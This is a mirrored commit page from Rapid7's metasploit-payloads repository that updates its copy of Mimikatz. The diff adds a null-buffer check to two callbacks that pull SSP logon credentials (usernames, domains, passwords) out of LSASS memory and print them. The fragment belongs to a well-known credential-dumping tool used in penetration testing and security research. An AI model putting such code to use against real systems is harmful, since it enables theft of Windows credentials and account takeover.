mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-12-02 20:36:40 +01:00
Updaetd to Mimikatz commit b66f5cb6cfb01c3e2179d76636f1990fa5b4d94d
This commit is contained in:
parent
2d37f71fd7
commit
ad49412f39
@ -53,7 +53,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LO
|
||||
{
|
||||
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)))
|
||||
{
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer))
|
||||
{
|
||||
kprintf(L"\n\t [%08x]", monNb++);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
|
@ -118,7 +118,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentia
|
||||
{
|
||||
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), NULL))
|
||||
{
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer))
|
||||
{
|
||||
dprintf("\n\t [%08x]", monNb++);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
|
Loading…
Reference in New Issue
Block a user